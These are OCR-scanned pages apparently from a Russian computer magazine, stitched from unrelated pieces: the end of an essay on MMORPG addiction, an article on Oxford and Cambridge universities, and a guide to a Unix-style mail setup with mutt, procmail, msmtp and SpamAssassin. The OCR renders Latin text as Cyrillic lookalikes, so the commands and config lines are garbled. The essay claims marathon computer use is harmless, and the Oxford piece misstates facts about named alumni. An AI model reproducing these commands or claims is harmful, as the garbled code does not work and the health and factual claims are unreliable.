здесь. С одной стороны, учеба/работа, кото- 
рые тебе наскучили, люди, тебе не интерес- 
ные, но с которыми приходится общаться, 
обязанности, которые вопреки своему жела- 
нию приходится исполнять. С другой — мир, 
который дает тебе свободу от всего этого. О 
том, что виртуальные миры реальным пред- 
почитают исключительно закомплексованные 
подростки, у которых ничего нет в реале, говорят обычно те, кто по- 
нятия об этом не имеет. Для успешных людей, независимо от возра- 
ста и пола, виртуальный мир представляет такой же соблазн, как и 
для всех остальных. Нужно только открыть в нее дверь. 

Конечно, для реальной жизни последствия виртуальной страсти могут 
быть печальными. Среди моих знакомых по ѴѴоѴѴ есть люди, которые за 
год из-за увлечения игрой успели разойтись с женой/девушкой, бросить 
работу/учебу, которые не выходили из дома неделями. Но я уверен, ког- 
да они в игре, они забывают обо всем. Помнится, кто-то писал: «В це- 
лом неважно, как ты живешь, главное, чтобы ты получал фан». Насчет 
угрозы здоровья у меня есть свое мнение. Мне кажется, что организм 
человека — это машина, которая умеет привыкать ко всему. И чем 
дольше ты работаешь за компьютером, тем свободнее ты чувствуешь 
себя в его обществе. У людей, которые редко юзают РС, от двухчасово- 
го сидения за ним начинают болеть и слезиться глаза. Хардкорный ком- 
пьютерщик может просидеть за компьютером трое суток (с перерывом 
на сон) и чувствовать себя превосходно. 

В будущем виртуальный синдром примет совсем другие масштабы. 
Только в ѴѴогІсІ оі ѴѴагсгаК сейчас играет более 5 миллионов людей, и 
это лишь один из сотен онлайновых миров. ММОВРО — достаточно 
молодой жанр и находится на ранней стадии 
своего развития. Чем дальше и чем реальнее 
будут интерактивные миры, тем больше лю- 
дей будут уходить в них с головой. Через лет 
20 нас ждет такой же бум ММОВРО, как сей- 
час — Интернета. И мало кому удастся избе- 
жать искушения почувствовать себя частью 
совсем другой истории 0 









ііНЕ^ ІІРЗ.затзипд п ( / 



Г/ 



и 



— шднс В ЫИГРА I Ь мТТпЛЕЕР ѴР-Т ■ Д вопросов , КАСАЮЩИХСЯ МРЗ- 

=Ь==^е===^” 

1 =====^=^^^ 

МУЗЫКИ! 

МРЗ.ЗАМЗідаз.вУ и ты гта — 



которых важные вопросы решаются совместно преподавателями и 
уполномоченными студентами. Также многие выпускники и учащиеся 
старших курсов принимают участие в обучении «молодых». Законода- 
тельным центром университета является Сенат, куда входят все акаде- 
мики, преподающие в Оксфорде. 

Год обучения в университете разделен на три семестра по 8 недель каж- 
дый: первый длится с октября по декабрь, второй — с января по март, 
третий — с апреля по июнь. Программа каждого семестра очень интен- 
сивная и рассчитана на то, что в перерывах между ними студенты будут 
тщательно готовиться к следующему. При поступлении можно выбрать 
любой из 50 курсов. Здесь есть как обычные курсы: медицина, химия, 
история искусств, компьютерная наука, так и узкоспециализированные: 
философия и теология, экспериментальная психология, археология и 
антропология. Помимо курса поступающие могут выбрать кампус, в ко- 
тором будут «жить». На процесс обучения это не влияет — кампусы от- 
личаются интерьерами (понятно, что кампус, построенный 500 лет назад 
не похож на тот, что построили недавно) и «жильцами». Чтобы упрос- 
тить общение студентам, многие кампусы разделены. Например, для за- 
рубежных студентов имеется свое здание, для выпускников известных 
британских колледжей — свое. 

Пару сотен лет назад, плата за обучение в Оксфорде была недоступ- 
ной, если только ты не закончил престижную школу или колледж. 
Единственным вариантом для бедняков, мечтающих все-таки пройти 
обучение, было оказаться в услужении студентов старших курсов и та- 
ким образом получить доступ к учебникам и лекциям. Сейчас, после 
введения разных грантов, плата за обучение в Оксфорде зависит от 
заслуг и способностей студента, а также от дохода его семьи. Перед 
поступлением с каждым человеком проводится длительное собеседо- 
вание, включающее тесты и интервью. Там у ребят есть возможность 
продемонстрировать свои знания, показать свои работы, убедить пре- 
подавателей в своей гениальности. Самым одаренным студентам га- 
рантировано место, даже если они не могут в полной мере оплачивать 
обучение. Также из-за большого количества поступающих, руковод- 
ство университетов Оксфорда и Кембриджа ограничило подачу заявок 
в оба эти вуза. В течение года ты можешь попытаться поступить лишь 
в один из них. Проще всего, конечно, выпускникам колледжей, где за- 
ранее готовят к вступительным экзаменам. Примерно половина сту- 
дентов университета Оксфорда состоит именно из таких, как их назы- 
вают, «эрудитов». Некоторые даже проходят дополнительный год обу- 
чения, чтобы иметь больше шансов на вступительных тестах. 
Учащиеся Оксфорда всегда уделяли большое внимание социальным 
занятиям: спорту, музыке, искусству. На территории университета су- 
ществует огромное количество клубов по интересам, спортивных сек- 
ций (только их более 70), кружков. Есть студенческая радиостанции и 
пресс-центр, в котором публикуются местные газеты. 

Выпускниками университета Оксфорда были многие известные личнос- 
ти, в том числе 12 королей, 47 нобелевских лауреатов, 28 президентов, 
более 50 премьер-министров, 86 архиепископов, руководители крупней- 
ших компаний мира. Если говорить о конкретных именах, можно при- 
вести в пример создателя ѵѵѵѵѵѵ Тима Бернерса-Ли, актера Хью Гранта, 
писательницу Льюис Кэрролл, поэтессу Перси Шелли и многих других. 
Список знаменитостей, окончивших Оксфорд, бережно ведется на его 
официальном сайте и является гордостью университета. 

В городе Оксфорд — помимо основного университета — существуют 
другие учебные заведения. Вторым по значимости является Оксфор- 
дский университет Брукса, прозванный «политехом». Требования 
для поступления там попроще да и учебная программа не такая ин- 
тенсивная. Остальные институты менее известны и не имеют отно- 
шения к двум этим вузам, но пользуются популярностью, так как их 
выпускникам разрешается говорить работодателям об окончании 
Оксфордского университета. 





вот в таких кампусах живут студенты Оксфорда 
город Оксфорд 

Выпускник Оксфорда и создатель ѴѴогІсІ ѴѴісІе ѴѴеЬ Тим Бернерс-Ли 
майский бал 



[Университет Кембриджа] Университет Кембриджа — второй ста- 
рейший вуз Великобритании. Как уже было сказано, основателями его 
стали преподаватели из Оксфорда, а первый кампус под названием Пе- 
терхауз был построен в 1284 году епископом Хьюх Бэлшамом. Расши- 
рение университета и возведение новых кампусов с тех пор происходи- 
ло постоянно вплоть до наших дней. 

В Средние века студенты Кембриджа должны были молиться за души ос- 
нователей их университета. Это была даже не традиция, а негласный за- 
кон, поэтому вуз причисляли к аббатству, а учащихся в нем — к священнос- 
лужителям. После того как король Генри VIII распустил факультет церков- 
ного права, строгие церковные обычаи прекратились, и фокус университе- 
та сменился в сторону более житейских наук: математики, физики, литера- 
туры. Как и во многих других английских институтах, в Кембридже долгое 
время обучались исключительно юноши. Только в 1869 году на его терри- 
тории построили первый кампус для девушек, но понадобилось еще почти 
100 лет, чтобы они смогли называть себя полноправными студентками. 
Несколько веков в Кембридже могли учиться преимущественно дети бо- 
гачей и чиновников. На вступительных экзаменах требовались знания, ко- 
торые давали в высокооплачиваемых школах и колледжах. Те, кто учил- 
ся в обычной школе, вынуждены были искать институт попроще. Систему 
приема в университет Кембриджа изменили только в 1960 году, и теперь 
не обязательно знать латынь или другие экзотические предметы, чтобы 
попасть в ряды студентов. На территории Кембриджского студенческого 
городка находится 31 кампус, в каждом из которых свои правила приема. 
В одних принимают только выпускников определенных школ, в других — 
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только аспирантов, в трех кампусах принимают исключительно девушек. 
Количество курсов в Кембридже на 20 меньше, чем в Оксфорде, охва- 
тывают они основные области знаний. Но есть и экзотика. Например, 
курс под длинным названием: «англо-саксонская, скандинавская и кель- 
тская история». Или «ветеринарная медицина». 

Университет Кембриджа имеет репутацию одного из лучших вузов в ми- 
ре, где изучают науку и технологии. Особенно прославился в этом пла- 
не четырехлетний математический курс Рагі III, который настолько 
сложный, насколько и престижный. Даже для самых одаренных выпуск- 
ников колледжа, закончивших его с отличием и серьезно увлекающих- 
ся математикой, Рагі III становится серьезным испытанием. Британские 
компании знают об этом, поэтому прохождение курса в их глазах при- 
равнивается к получению высокой степени в одном из других вузов. 
Университет также стал излюбленным местом для чтения лекций про- 
фессорами и исследователями со всех концов Европы. Некоторых приг- 
лашают, многие приезжают сами. Темы лекций могут быть самыми раз- 
ными, объединяет их, как правило, полный зал слушателей. 

В университете Кембриджа существует не меньше сотни студенческих 
организаций. Крупнейшей из них и одной из старейших студенческих ор- 
ганизаций в мире является Объединенный Союз Кембриджа. Основан он 
был в феврале 1915 года как небольшой клуб для общения, но быстро 
превратился во влиятельную организацию, куда входили самые уважае- 
мые жители Кембриджа и где обсуждались все горячие вопросы. Сейчас 
Союз имеет четкую структуру, руководство во главе с президентом и иг- 
рает большую роль в жизни университета. А дебаты, проходящие внут- 
ри, часто заслуживают внимание ведущих газет и журналов мира. 
Другая интересная студенческая организация — «Апостолы Кембриджа». 
Это закрытый и даже секретный интеллектуальный клуб, который якобы 
состоит из 12 умнейших студентов университета. Встречи этого клуба 
проходят по субботним вечерам, в это время один из участников читает 
подготовленную речь на произвольную тему, которая позже обсуждается 
всеми. К потенциальным членам клуба, которых «апостолы» называют 
«эмбрионами», долго присматриваются, и в конце концов приглашают на 
специальную вечеринку. Там уже решается, достойны ли они зачисления. 
На территории вуза проходит много интересных мероприятий, инициа- 
торами которых становятся сами студенты. Например, традиционный 
Майский бал, временем проведения которого является июнь (в мае идет 
учеба). Начинается он в 9 вечера и длится до самого утра. Студенты и 
студентки, одетые в костюмы и вечерние платья, собираются в саду, по- 
светски общаются, катаются на гондолах. Билет, кстати, стоит недеше- 
во — от 80 до 1 60 фунтов. Подобные тусовки проходят круглый год и да- 
леко не всегда имеют такой формальный характер. Некоторые больше 
напоминают опен-эйр с электронной музыкой и пивом. 

Университет Кембриджа имеет хорошие отношения с легендарным МТИ 
и тесно связан с ведущими компаниями Великобритании, работающими в 
сфере ІТ. На территории города есть большой район, прозванный по ана- 
логии с Кремниевой долиной, — Кремниевое болото (Зііісоп Реп). Многие 
двигатели хай-тека имеют там свои офисы и лаборатории, поэтому это 
место считают одним из самых важных технологических центров Европы. 
Разработки, которые ведутся на территории «болота» настолько важны, 
что щедро финансируются такими монстрами, как Місгозоіі и Іпіеі. 
[Легенды и традиции] История двух старейших вузов мира полна со- 
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спортивная команда «Синих» из Кембриджа 

здание Сената (слева) и университетская церковь (справа) в центре 
Кембриджа — ► 

старейший кампус Кембриджа «Королевский» — ► 
старая картинка дебатов в Объединенном Союзе Кембриджа 



бытий как забавных, так и драматических. Одним из самых известных 
эпизодов истории Оксфорда стало побоище, которое произошло с 10 по 
12 февраля 1355 года. Все началось со спора в городской таверне между 
горожанами и двумя студентами, которые разошлись во мнениях о каче- 
стве местного пива. Словесная перепалка вскоре переросла в драку. Ин- 
цидент после этого не закончился: собрав товарищей и вооружившись 
всем, что под руку подвернулось, студенты отправились на следующий 
день в город искать виновных. Г орожане были готовы дать отпор, крова- 
вая резня продолжалась два дня и закончилась смертью 63 студентов и 
более 30 горожан. С тех пор 10 февраля в Оксфорде ежегодно проводил- 
ся марш в память о погибших, а руководство города традиционно плати- 
ло штраф в 1 пенни за каждого из 63 убитых студентов. Закончилась эта 
традиция в 1825 году отказом нового мэра принимать в ней участие. 
Среди главных достопримечательностей Кембриджа является математи- 
ческий мост. По легенде его построил Исаак Ньютон, причем соорудил 
таким образом, что он мог держаться безо всяких болтов и шурупов. 
Впоследствии оказалось, что это не так — мост возвели 22 года спустя 
после смерти ученого. Держался он тогда на железных закрепках, кото- 
рые были практически не видны со стороны, и только позже реставриро- 
ван с использованием современных материалов. Но история о мосте, ко- 
торый построил сам Ньютон, до сих пор жива и переходит из уст в уста. 
Другой легендой Кембриджа, на этот раз правдивой, является история 
с деревянными ложками. До 1909 года ими награждали студентов, ко- 
торые набирали минимальный бал на выпускном экзамене по матема- 
тике. Последняя ложка досталась некоему Катбергу Лэмпраеру, лю- 
бившему водную греблю намного больше уравнений. Приз был более 
метра в длину, а рукоятка выполнена в форме весла. Забавная тради- 
ция прекратилась после того, как результаты экзаменов стали публи- 
коваться в алфавитном порядке вместо списка «от лучшего к худше- 
му», что усложняло определение победителя. 

А в канун Рождества телеканал ВВЗ ежегодно передает из Кембриджа 
«Фестиваль девяти уроков и песен», который для христиан стал чем-то 
вроде «Голубого огонька» под Новый Год в России. Эта традиция нача- 
лась в 1928 году с выступления группы учеников под предводитель- 
ством Эрика Милнера-Вайта, исполнивших церковную службу в честь 
Рождества Христова. И продолжается до сих пор. 



[Многовековое противостояние] На протяжении нескольких веков 
между двумя университетами происходит яростное соперничество. В пер- 
вую очередь это касается спорта, которому студенты обоих вузов уделя- 
ют много свободного времени. Ежегодные соревнования проводятся по 
водной гребле, регби, футболу, баскетболу, крикету, боксу, шахматам... 
Первым серьезным студенческим турниром стал турнир по крикету, 
который состоялся 4 июня 1827 года. Но особую популярность среди 
студентов завоевали гонки на байдарках. В 1829 году студент Кемб- 
риджа Чарльз Меривель вызвал своего приятеля из Оксфорда Чарль- 
за Вордзворса на дружеское состязание по гребле. Но, проиграв в 
этом году, он попытался взять реванш в следующем. На этот раз ему 
удалось победить, а соревнование стало ежегодным, получившим по- 
пулярность не только среди студентов двух вузов, но и всех жителей 
Великобритании, которые с удовольствием смотрят его по ВВС. На 
протяжении многих лет команды обменивались победами и пораже- 
ниями, защитить честь университета стало принципиальным для 
спортсменов. К этому времени счет составляет 78 — 72 в пользу Кемб- 
риджа и тщательно ведется спортивным комитетом. 

Лучших спортсменов из Оксфорда и Кембриджа, которые хорошо проявили 
себя в спортивной борьбе, награждают почетным званием «Синий». Синим, 
за их заслуги, вручают одежду синего цвета: от шарфов до галстуков. Но 
высшей наградой считается синяя куртка — символ того, что ты среди луч- 
ших. Несмотря на то, что синий цвет принят для поощрения спортсменов в 
обоих вузах, оттенки их отличаются. В Оксфорде — темно-синий, в Кемб- 
ридже — светло-синий. Определением и награждением лучших спортсме- 






ЮНИТЫ КРЕАТИФФ КОДИНГ ІШІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВРШМ НЬЮСЫ 





Крылатая 
почта юниксоида 

ДЛЯ ЧЕГО, ПО-ТВОЕМУ, ПРЕДНАЗНАЧЕН ПОЧ- 
ТОВЫЙ КЛИЕНТ? ПРАВИЛЬНО, ЧИТАТЬ ПОЧТУ. 
А ТЫ НИКОГДА НЕ ЗАДУМЫВАЛСЯ, ПОЧЕМУ 
ВСЕ СОВРЕМЕННЫЕ МІІА (01ГП.00К ЕХРВЕЗЗ, 
ТНІІЫОЕВВІРЮ, ЗУ1_РНЕЕЭ), КРОМЕ ВЫПОЛНЕ- 
НИЯ СВОИХ НЕПОСРЕДСТВЕННЫХ ЗАДАЧ, 

ЕЩЕ И СОРТИРУЮТ ПОЧТУ, ПОЛУЧАЮТ И ОТП- 
РАВЛЯЮТ ПИСЬМА, ОБРАБАТЫВАЮТ СПАМ, 

В ОБЩЕМ, ЗАНИМАЮТСЯ ВСЕМ, ЧЕМ УГОДНО, 
РАЗВЕ ЧТО КОФЕ НЕ ВАРЯТ? ТАК УЖ ПОВЕ- 
ЛОСЬ В СОВРЕМЕННОМ МИРЕ «ДРУЖЕЛЮБ- 
НЫХ К ПОЛЬЗОВАТЕЛЮ» СИСТЕМ, ЧТО ВСЕ 
СВЯЗАННОЕ С ОПРЕДЕЛЕННЫМ КРУГОМ ЗА- 
ДАЧА (В НАШЕМ СЛУЧАЕ — С ПОЧТОЙ) ДЕЛА- 
ЕТ ОДНА БОЛЬШАЯ ПРОГРАММА. И ПОЛЬЗО- 
ВАТЕЛЬ ДАЖЕ НЕ ЗАДУМЫВАЕТСЯ, ЧТО ТЕМ 
САМЫМ СИЛЬНО СЕБЯ ОГРАНИЧИВАЕТ. ЗА- 
ЧЕМ, НАПРИМЕР, МНЕ ДЕРЖАТЬ ЭТУ ПРОГ- 
РАММУ ЗАПУЩЕННОЙ, ЕСЛИ Я ХОЧУ ВСЕГО 
ЛИШЬ АВТОМАТИЧЕСКИ ЗАБИРАТЬ НОВУЮ 
ПОЧТУ С СЕРВЕРА. ИЛИ АВТОМАТИЧЕСКИ ПЕ- 
РЕСЫЛАТЬ ОПРЕДЕЛЕННЫЕ СООБЩЕНИЯ НА 
ДРУГОЙ ЯЩИК. ИЛИ ОТПРАВЛЯТЬ ПОЧТУ НЕ 
СРАЗУ, А В ОПРЕДЕЛЕННОЕ ВРЕМЯ. К 
СЧАСТЬЮ, ЕСТЬ ПУТЬ, СПОСОБНЫЙ ОСВОБО- 
ДИТЬ НАС ОТ РАМОК ОДНОЙ ПРОГРАММЫ. И 

ИМЯ ЕМУ — ІІІМІХ-ѴѴАѴІ Апіоп Кагроѵ <Іоха@ІохаІ"Ю5І.ги> 



Почтовая система в стиле ІЛЧІХ-ѵѵау 

[ингредиенты] Для приготовления нашей почтовой пользовательской сис- 
темы нам понадобятся следующие компоненты: тиК, деітаіі, ргостаіі, зра- 
таззаззіп, тзтір, а также ѵіт, дпирд, апйѵѵогсі и таігіх — по вкусу. Я исполь- 
зую РгееВЗй, поэтому весь софт будем ставить из портов. Разумеется, нет- 
рудно спроецировать процесс установки и на твой любимый дистрибутив. 
МіШ — превосходный консольный почтовый клиент, способный творить 
с письмами невероятные вещи. Расписывать все его достоинства не 
имеет смысла, достаточно сказать, что это самый популярный МІІА сре- 
ди разработчиков из орепзоигсе-сообщества, кернел-хакеров и просто 
крутых юниксоидов ;-). Мы будем ставить его беѵеі-версию 1.5.x («ста- 
бильная» ветка имеет сейчас номер 1.4.x), которая имеет такие преиму- 
щества, как скорость работы, поддержку ЗМІМЕ-расширений (1 ,4.x уме- 
ет только РОР-шифрование), и в то же время достаточно стабильна. Мы 
научим тиН читать пеѵѵз-конференции. 

# ссі /изг/рогіз/таіі/тий-сіеѵеі 

# таке ѴѴІТН_МиТТ_МАІЮІВ_МТІМЕ_РАТСН=уе5 
ѴѴІТН_МІІТТ_ШТР=уе5 ѴѴІТН_МиТТ_ІМАР_НЕА0ЕВ_САСНЕ=уез 
ѴѴІТН_МиТТ_МАИ0ІВ_НЕА0ЕВ_САСНЕ=уе5 
\Л/ІТН_МІЛТ_Е0ІТ_ТНВЕА03=уез іпзіаіі сіеап 

Как видно, вместо традиционного тЬох я собираюсь использовать 
Маіісііг-формат почтового ящика. Для меня основным преимуществом 
Маіісііг является формат «одно письмо — один файл». 

Оеітаіі — программа для доставки почты с удаленных РОРЗ/ІМАР-сер- 
веров с множеством удобств и приятностей (поддержка ЗЗІ_, доставка в 
Маіісііг-зіуіе ящики, докачка сообщений после разрыва сессии и т.п.), на- 
писанная на Питоне. Более популярный вариант — ІеІсГітаіІ. 

# ссі /изг/рогіз/таіі/деітаіі 

# таке іпзіаіі сіеап 

Также нам не обойтись без ргостаіі. Она будет обрабатывать, модифи- 
цировать (если нужно) и выполнять сортировку сообщений по папкам. 

# ссі /изг/рогіз/таіі/ргостаіі 

# таке іпзіаіі сіеап 

Мзтф — это легковесный почтовый агент, созданный для машин, на ко- 
торых нет запущенного ЗМТР-демона. Исторически (так сказать, Ьу 
сіезідп) подразумевается, что на каждой *піх-машине работает почтовый 
сервер (хотя бы для обработки локальных отчетов администратору, см. 
регіосІіс(8)), настроенный, при необходимости, на релей «внешнего» поч- 
товика. Но часто на безкіор-машинах это совсем не так: регіосііс Сазкз уби- 
рают из сгопІаЬ(5), а почтовый сервер выключают. В этом случае вместо 
зепсітаіі можно использовать тзтф, который имеет поддержку ЗМТР-ав- 
торизации, ТІ_3, множества аккаунтов, но при этом не выступает в роли 
полноценного МТА (не слушает порт и не принимает соединения). 

# ссі /изг/рогіз/таіі/тзтір 

# таке \ЛЛТН_0РЕМ331_=уез іпзіаіі сіеап 

Со спамом можно бороться разными способами, но если ты пользова- 
тель, а не админ почтового сервера, то для тебя остается один путь — 
ЗратАззаззіп. Он использует текстовые анализаторы и Ыаск-листы для 
определения спама. 



ЧТО ТАКОЕ ШЧІХ-ѴѴАѴ? 

Вопрос этот из разряда философских. И не стоит в компа- 
нии фанатичных юниксоидов поднимать на обсуждение 
тему вроде «правда ли, что регі — это не ІІІМІХ-ѵѵау» :). 
Технически же — это то, на чем основана вся работа в 
классическом ІІІМІХ: когда для каждой конкретной задачи 
существует одна маленькая программа, ничего больше не 
умеющая, зато выполняющая свою работу на все сто. 

Г ибкость и сила проявляются в соединении этих прог- 
рамм, например, через каналы (рірез), когда вывод одной 
команды подается на ввод другой. Например, если я хочу 
посчитать, сколько человек запросило определенный 
файл с сервера по ГіНр, я набираю команду: 



# саІ/ѵаг/ІодМрсІ-ассезз.Іод I дгер 46664.трд I аѵѵк '{ргіпі 
$1}' I зоіі I ипід I ѵѵс -I 
200 

В этой простой команде задействовано 6 утилит. В *піх- 
системе их сотни, каждая делает что-то свое и имеет ог- 
ромное количество опций, так что можно представить, от- 
куда берется та пресловутая гибкость работы в *піх. Г иб- 
кость увеличивается также и классической юниксовой па- 
радигмой «все — файл», когда любая прикладная задача 
сводится, по сути, к работе с текстовыми файлами с по- 
мощью вышеозначенных утилит. 






схема взаимодействия компонентов почтовой системы 




# ссі /изг/рогІз/таіІ/рб-МаіІ-ЗратАззаззіп 

# таке іпзіаіі сіеап 

Если ты хочешь защитить свою переписку или, по крайней мере, прове- 
рять/подтверждать аутентичность сообщений, тебе понадобится ОпиРО. 

# ссі /изг/рогіз/зесигііу/дпирд 

# таке іпзіаіі сіеап 

Забегая вперед, скажу, что тиЛ умеет отображать вложения ничуть не 
хуже, чем ТГіе ВАТ'ы и ОіЛІоок'и, вызывая сторонние программы для об- 
работки аттача в зависимости от его МІМЕ-типа. Так, для просмотра М$ 
ѴѴогб-файлов нам понадобится апііѵѵогсі — по сути, преобразователь 
.бос в .1x1: 

# ссі /изг/рогІзДехфгос/апІіѵѵогсІ 

# таке іпзіаіі сіеап 

Никак не обойтись и без поиска по бездонным папкам почтового ящика. 
В Маіібіг'е очень хорошо ищет таігіх. Утилита создает виртуальную пап- 
ку, в которую складывает результаты поиска. Очень удобно. 

# ссі /изг/рогіз/таіі/таігіх 

# таке іпзіаіі сіеап 

Ну и, разумеется, сочинять письма мы будем в своем любимом тексто- 
вом редакторе. Это дело личного вкуса каждого. Я использую ѵіт. 

[готовим!] Собрав и разложив по полкам ингредиенты, начинаем гото- 
вить. Начнем с «основы основ» — конфигурационного файла МіШ. Са- 
мый распространенный метод — занести все опции в конфиг ~/.тіШгс. 
Это неудобно по нескольким причинам, главная из которых — как сле- 
дует настроенный тиЛ имеет конфиг размером в несколько десятков 
килобайт, искать и править нужную опцию в этом случае не самое весе- 
лое развлечение. Я предпочитаю логически разделить настройку клиен- 
та на несколько конфигов и подключать их в главный файл. В этом слу- 
чае удобнее создать папку ~/.ітіиЛ, а в ней — тііЛгс (без точки). 
Настройка тиЛ — длительный, но приятный процесс :). Почитывая доку- 
ментацию, ты открываешь для себя все новые опции, и все больше наст- 
раиваешь клиент по своему вкусу. Те же, кто не любит читать докумен- 
тацию, могут найти на нашем диске полностью отточенные конфиги, ко- 
торыми я пользуюсь каждый день. Здесь же приведу основные опции с 
комментариями, без которых не обойтись. 

Сила тиЛ — в его конфигах. Синтаксис основного конфигурационного файла 
имеет вид: зеі пате[=ѵаІие]. Этот конфиг будет содержать только главные оп- 
ции, которые вряд ли придется часто менять. Переменная пате, в зависимос- 
ти от опции, может быть строкой, либо переменной вида уезіпо, а также 
азк-[уезІпо], в этом случае клиент будет запрашивать подтверждение на 



операцию, с отмеченным по умолчанию значением уез или по. Допустимо так- 
же использование конструкций вида ипзеі ѵаіие и зеі ѵаіие, когда подразумева- 
ется по или уез. Например, "зеі циіЬазк-уез" означает запрос подтверждения на 
выход из тий (по нажатию клавиши ц), по умолчанию (если ничего не вводить 
в ответ на запрос) будет считаться ответ уез. В дополнительные конфиги мы 
вынесем настройку заголовков писем, привязок клавиш к действиям, настрой- 
ку обработчиков событий («хуков»), РОР и цветовых оформлений (тем). 
Сначала мы определим заголовки, которые будут подставляться в письмо, 
и заголовки, которые будут выводиться в клиенте при просмотре писем. 



# определяем ЗМТР-заголовки писем, которые будут подставляться 
в наши сообщения 

ту_бс1г Ргот: "Апіоп А. Кагроѵ" <Іоха@ІохаІюзІш> 
ту_Мг Х-СоттепІ-То: "Апіоп А. Кагроѵ" 2 

ту_Мг ІІзег-АдепІ: ОиІІиск Ехргезз 1.5.6І Тог МЗ-ЭОЗ 6.22-ЗМР 
ту_бс1г Х-Маііег: Зее ІІзег-АдепТ аЬоѵе :) 

ту_ІгсІг Х-ОрегаТіпд-ЗузТет: МЗ-ЭОЗ 6.22-СІІВВЕІМТ оп Зопу ѴАЮ ІарТор 
ту_Мг Х-РѲР-РиЫіс-Кеу: ИТТрѴ/ѵѵѵѵѵѵ.ТохаІтозТ.ги/дрд/риЬкеу.азс 
ту_бс1г Х-ІІзеІезз-НеасІег: Эо Апсігоісіз Эгеат о! ЕІесТгіс ЗІгеер? 

Хуки — один из мощных бонусов тиЛ. С помощью условий можно пере- 
определять указанные ранее опции, привязывать их, например, к имени 
получателя и т.п. 



# данный хук меняет заголовок Ргот в случае, если получатель пись- 
ма имеет адрес вида <пате>@геаІ.хакер.ш 

зепсі-ііоок '~1 @геа1\.хакер\.ш' 'ту_ІісІг Ргот: Апіоп Кагроѵ 
<Іоха@геаІ.хакер.ги>' 

# а этот хук включает рдр-шифрование (по умолчанию я не шифрую 
письма), если получатель — ріЛіп@доѵ.ги 

зепсі-ііоок '~1 л рЩіп@доѵ\.ги$' 'зеТ рдр_аиТоепсгурТ' 



$ ѵі ~/. т иТТ/И еасі е гз . т иТТ 

# выключаем дефолтный порядок представления заголовков 
ідпоге * 

# включаем только интересующие нас поля 

ипідпоге Вес Сс Эаіе Ргот МаіІіпд-изТ ІМеѵѵздгоирз ОгдапігаТіоп 
Веріу-То ЗиЬіесТ То ІІзег-АдепТ Х-Маііег Х-Зрат-ЗІаІиз Х-ОтаіІ- 
Зсаппег Х-Зрат 

# определяем порядок их вывода на экран 

Мг_огсІег Эаіе Ргот: То Сс Веріу-То ЗиЬіесТ ІІзег-АдепТ Х-Маііег 
Х-Зрат-ЗІаІиз Х-ОтаіІ-Зсаппег Х-Зрат 



[$ ѵі -/.тиК/боокз.тиЩ 



РАЗБИРАЕМСЯ С ТЕРМИНОЛОГИЕЙ 

Почтовый клиент сокращенно называют МІІА (МаіІ ІІзег Адепі). 
По аналогии почтовый сервер называют МТА (МаіІ Тгапз^ег 
АдепІ). Программа же, занимающаяся доставкой почты от сер- 
вера клиенту (но не обработкой, ни чтением, ни, тем более, 
составлением писем), называется МйА — МаіІ йеііѵегу АдепТ 



А 

Ю 

О 

Будь внимателен, убирая из сгопіаЬ все запуски регіосііс. Взгля- « 
ни на скрипты в /еіс/регіосііс: помимо составления отчетов руту, - 

регулярно выполняются такие вещи, как обновления базы для о. 

Іосаіе(і). Бездумно удаляя все подряд, можно, например, * 

лишить себя свежей ІосаІе.сІаІаЬазе. 21 



аюхіічп 
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Мне не нравятся сочетания клавиш по умолчанию. Плюс к этому, я хочу 
повесить свои хоткеи на часто выполняемые операции. 

$ ѵі ~/.тий/ЬіпсІіпдз.тий 

# по умолчанию я использую свой сервер для отправки писем, но 
при нажатии в клиенте сочетания <Езс-4>, зтф-аккаунт для отправ- 
ки писем будет меняться на дтаіГовский: 

тасго депегіс "<езс>4" ":зеІ $епбтаіІ=\Уи5г/ІосаІ/Ьіп/т$тф -а дтаіІѴ" 

# перемещаться по сообщениям клавишами ІІР и ООѴѴЫ 
ЬіпсІ радег <ІІР> ргеѵіоиз-раде 

ЬіпсІ радег <00\Л/І\І> пехі-раде 

# при нажатии клавиши '3' в окне просмотра писем вызывается на- 
писанный мной скрипт, который подсчитывает количество писем во 
всех ящиках 

тасго іпсіех 3 " ! -/. т иН/зсгі різ/тзд п и т . зИ\г" 

# при нажатии 0 в окне просмотра писем, сообщения, или отправке 
письма, будет вызываться программа получения почты 

тасго радег 0 "ІдеІтаіІѴ" 
тасго Ьгоѵѵзег 0 "ІдеІтаіІѴ" 
тасго іпсіех 0 "ІдеІтаіІѴ" 

# нажатие 2 на отмеченном письме, которое проскочило спам- 
фильтр, «обучит» ЗратАззаззіп, чтобы в дальнейшем оно опреде- 
лялось как спам. 

тасго іпсіех г "Іза-Іеагп -по-зупс -зрат\п" 

# по сочетанию клавиш переходить в соответствующие папки 
тасго іпсіех ",Г "с=ІгееЬзсІ-Іі5Г 

тасго іпсіех ",о" "с=оЬзсІ-ІізГ" 

МіШ может быть полностью перекрашен во все цвета радуги. Не буду при- 
водить здесь описание цветовой схемы, на диске ты найдешь файл с темой 
Юхараіпі, где полностью расписаны все элементы оформления клиента. 

$ ѵі -/.тиК/Шетез/туШете 

Настройки ОпиРО лучше всего взять из примера, входящего в докумен- 
тацию. Они вполне разумны и требуют изменений в редких случаях. 

$ ѵі -/.тиП/дрд.тіт 

Теперь перейдем к основному конфигурационному файлу. 

$ ѵі -Лтии/тиКгс 

# подключаем написанные ранее конфиги 
зоигсе -/.тии/беасіегз.тии 

зоигсе -ЛтииЛіоокз.тіШ 
зоигсе -Атии/ЬіпсІіпдз.тиК 
зоигсе -ЛтиК/дрд.тиК 
зоигсе -/.тиК/Шетез/туШете 

# нижеследующие опции мы не выносим в отдельные файлы, 
хотя у экстремалов тиКгс состоит из одних зоигсе-включений 

# группа опций, отвечающая за кодировку писем 
зеі сбагзеІ=коі8-г 

зеі зепс!_сІіаг5еЬ"коі8-г" 
зеі а11о\л/_8Ы1=уез 

# а это касается заголовков и редактора 
зеі изе_1гот=по 

зеі епѵеІоре_Тгот=по 

зеі аНгіЬиІіоп="Оп %ф %п ѵѵгоіе:" 

зеі есШог="ѵіт +':зеІ ІехІ\А/ісШі=72' %з" 

# удалять письма без подтверждения 
зеі беІеІе=уез 

# спрашивать сохранение копии исходящего письма 
зеі сору=азк-по 

# спрашивать при печати письма 
зеі ргіпФазк-уез 

# включать оригинальное письмо при ответе (цитирование) 



зеі Іпс1ис1е=уе5 

# уточнять, действительно ли ты хочешь выйти из тиК 
зеі циіЬазк-уез 

# не соединять аттачи в один файл 
зеі аКасІі.зрІіІ 

# при ответе на письмо не спрашивать про поля То, СС 
зеі Іазфгеріу 

